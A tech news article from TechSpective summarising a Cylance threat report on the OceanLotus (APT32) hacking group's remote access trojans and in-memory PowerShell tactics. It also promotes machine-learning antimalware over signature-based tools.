Facebook Twitter Instagram YouTube LinkedIn
    Facebook Twitter Instagram LinkedIn YouTube
    Trending
    • Rajiv Kulkarni Talks about the Malware Analysis Pipeline
    • IDS Alliance Raises Awareness of IAM Fundamentals with the ‘CISO Chronicles’
    • Building Digital Accessibility: AI Requires Human Oversight to Cut Down on Algorithmic Biases
    • BlackBerry Ivy: Enabling a New Age of Electric Secure Autonomous Vehicles
    • Security Automation Cuts Down Expenses and Saves Time for IT Teams
    • IBM Think 2022 – Embracing the Present, Preparing for the Future
    • A Game of Numbers: The Correlation Between Technology and Sports Betting
    • Software-based Enterprise Solutions for Navigating the “Too Much Information” Age
    TechSpective
    • RSS
    • Facebook
    • Twitter
    • Google+
    • LinkedIn
    • Instagram
    • Pinterest
    • Technology
      Featured
      March 1, 20216

      Could Home Study Be Better for Education? Using Technology to Craft a Better Tomorrow

      Recent
      May 20, 2022

      Building Digital Accessibility: AI Requires Human Oversight to Cut Down on Algorithmic Biases

      May 20, 2022

      BlackBerry Ivy: Enabling a New Age of Electric Secure Autonomous Vehicles

      May 15, 2022

      A Look At The Last Generation Of Internal Combustion Engines

    • Reviews
      Featured
      March 4, 20211

      Dell’s UltraSharp 40 – Improving Work and Workplaces with Monitor Innovations

      Recent
      April 7, 2022

      Dell’s Latitude 5430 Rugged – Redefining the Extremes of Mobile Computing

      October 12, 2021

      Innovating Home Video Conferencing: Dell’s New 27 Video Conferencing Monitor – S2722DZ

      September 22, 2021

      Review: Intrusion Shield

    • Podcasts
    • Security
      Featured
      March 7, 20212

      Pandemic Unmasks Vulnerability to Automated Bot Attacks

      Recent
      May 25, 2022

      Rajiv Kulkarni Talks about the Malware Analysis Pipeline

      May 23, 2022

      IDS Alliance Raises Awareness of IAM Fundamentals with the ‘CISO Chronicles’

      May 14, 2022

      Ransomware is Indiscriminatory – Prepare for Everything to Fail

    • Microsoft
      Featured
      September 12, 20201

      The Microsoft Surface Duo: The Communications Device for Those That Think Different

      Recent
      April 8, 2022

      AI and Why Windows 12 Could Be a Far Bigger Advance than Windows 95 Was

      October 11, 2021

      The Surface Laptop Studio: Building a Windows 11 Targeted Laptop

      August 28, 2021

      Why Microsoft’s Hardware Baseline for Windows 11 Is Important

    • News & Analysis
      Featured
      March 6, 20212

      Fixing The World One Person At A Time: Cisco Networking Academy

      Recent
      May 25, 2022

      Rajiv Kulkarni Talks about the Malware Analysis Pipeline

      May 20, 2022

      BlackBerry Ivy: Enabling a New Age of Electric Secure Autonomous Vehicles

      May 20, 2022

      IBM Think 2022 – Embracing the Present, Preparing for the Future

    • Business
      Featured
      March 6, 20212

      Fixing The World One Person At A Time: Cisco Networking Academy

      Recent
      May 20, 2022

      Building Digital Accessibility: AI Requires Human Oversight to Cut Down on Algorithmic Biases

      May 20, 2022

      Security Automation Cuts Down Expenses and Saves Time for IT Teams

      May 18, 2022

      Software-based Enterprise Solutions for Navigating the “Too Much Information” Age

    TechSpective
    You are at:Home»Security»APT (Advanced Persistent Threats)»Cylance Report Reveals Malware and Tactics of OceanLotus Group and Weakness of Traditional AV
    OceanLotus Group remote access trojans
    Image from Pixabay

    Cylance Report Reveals Malware and Tactics of OceanLotus Group and Weakness of Traditional AV

    0
    By Tony Bradley on October 26, 2018 APT (Advanced Persistent Threats), Cyber Espionage, Malware, Remote Access Trojan, Security

    Exploits and attackers come in various forms. Just like crime in real life, there are vandals and people just trying to wreak havoc, there are petty thieves and lone wolf criminals, and there is organized crime—crime families that make a career out of cyber attacks. The OceanLotus Group—also referred to as APT32 or Cobalt Kitty—is one such family. Cylance recently released detailed security research to shed light on the tactics and techniques employed by OceanLotus Group to make it easier to identify and defend against attacks from them.

    The investigation by Cylance began during incident response and threat research activity at the end of 2017. Cylance researchers discovered several custom backdoors deployed by OceanLotus Group, and evidence that the attackers were obfuscating payloads to perform command and control (C2). In addition, they determined that OceanLotus Group routinely uses PowerShell commands to download and deploy malware—allowing most of the malware to operate in-memory with zero footprint on systems storage.

    There are a handful of RATs (remote access trojans) developed by OceanLotus Group. Named after famous rats—Roland, Remy, Splinter—Cylance found that these RATs are carefully crafted to mimic legitimate DLLs of the victim organization. Cylance researchers also discovered that the malware C2 protocols are specifically tailored for each target as well.

    Cylance

    I spoke with Tom Bonner, Director of Threat Research for Cylance, about the report. He talked about how OceanLotus Group is able to surreptitiously stream video from compromised systems, and the risk that poses for organizations. He shared that Cylance developed this report to document the findings from Cylance research publicly, and to provide a thorough overview of how they operate, and how the protocols work for command and control so organizations—and other security vendors—can defend against these attacks more effectively.

    We also talked about the power of machine learning and the impact of predictive advantage. While many of the household names in antimalware and traditional security tools may struggle to identify and block these threats until or unless vendors capture a sample to reverse engineer and develop the appropriate signatures, Cylance has been able to detect all of the variants for more than two years. For some variants, the predictive advantage for Cylance is as much as three years. In other words, if you installed Cylance two years ago and never updated it again, it would still be able to protect you from these OceanLotus Group attacks.

    There are fundamental shifts that occur with technology, and sometimes it takes a while for the ripple effect to expand. But, just as we now say, “Who are the people who are still using 3.5-inch floppy disks?” or “Who are these people who still use fax machines?”, we will eventually—sooner rather than later—be saying, “Who are the people still using reactive antimalware solutions that require signatures?”

    Transformation takes time and there is an education process that must happen. Many organizations and individuals continue to buy traditional antimalware because it’s just what they’ve always done and they’re not aware of alternatives. That fundamental shift already happened, though, and the ripple effect of transitioning from legacy antimalware to more effective protection based on machine learning and artificial intelligence is just a matter of time.

    For more details on the OceanLotus Group, and the research on the malware tools and techniques they use, check out the complete Analysis of OceanLotus Group’s Latest Attack Tactics report.

    Share. Facebook Twitter Pinterest LinkedIn Tumblr Email
    Previous ArticleProviding Value and Growing Your Audience with Custom Content
    Next Article Why NVIDIA’s Autonomous Car Safety Leadership Is Critically Important
    Tony Bradley
    • Website
    • Facebook
    • Twitter
    • LinkedIn

    I have a passion for technology and gadgets--with a focus on Microsoft and security--and a desire to help others understand how technology can affect or improve their lives. I also love spending time with my wife, 7 kids, 2 dogs, 5 cats, 1 rabbit, 2 ferrets, a pot-bellied pig, and sulcata tortoise, and I like to think I enjoy reading and golf even though I never find time for either. You can contact me directly at tony@xpective.net. For more from me, you can follow me on Twitter, Facebook, Instagram and LinkedIn.

    Related Posts

    Rajiv Kulkarni Talks about the Malware Analysis Pipeline

    IDS Alliance Raises Awareness of IAM Fundamentals with the ‘CISO Chronicles’

    Ransomware is Indiscriminatory – Prepare for Everything to Fail

    Comments are closed.

    Site Sponsors
    Intel
    DevOps.com
    Adobe
    PopSpective
    • Technology
    • Popular
    • Top Reviews
    May 20, 2022

    Building Digital Accessibility: AI Requires Human Oversight to Cut Down on Algorithmic Biases

    May 20, 2022

    BlackBerry Ivy: Enabling a New Age of Electric Secure Autonomous Vehicles

    May 15, 2022

    A Look At The Last Generation Of Internal Combustion Engines

    9.0
    July 14, 2016

    Review: Lenovo Yoga 900S

    9.5
    March 2, 2015

    Review: Asus Zenbook UX305 ultrabook

    8.0
    February 9, 2015

    Review: Burg 12 smartwatch

    9.7
    November 16, 2018

    Review: BlackVue DR900S-2CH Vehicle Dash Cam

    9.5
    September 2, 2015

    Review: Microsoft Band

    May 27, 2014

    Protect your family photos with ScanMyPhotos

    Popular Posts
    9.0
    July 14, 2016

    Review: Lenovo Yoga 900S

    9.5
    March 2, 2015

    Review: Asus Zenbook UX305 ultrabook

    8.0
    February 9, 2015

    Review: Burg 12 smartwatch

    Coffee and Politics
    Coffee and Politics
    Coffee and Politics
    • RSS
    • Facebook
    • Twitter
    • Google+
    • LinkedIn
    • Instagram
    • Pinterest
    About

    TechSpective covers technology trends and breaking news in a meaningful way that brings value to the story, and provides you with information that is relevant to you. We offer in-depth reporting and long-form feature stories, as well as breaking news coverage, product reviews, and community content in plain English terms, and with a unique perspective on technology.

    Coffee and Politics

    © 2020 Xpective, Inc.

    • About
    • Privacy
    • Advertise
    • Subscribe
    • Contact
    © 2021 Xpective, Inc.
    • About
    • Privacy
    • Advertise
    • Subscribe
    • Contact

    Type above and press Enter to search. Press Esc to cancel.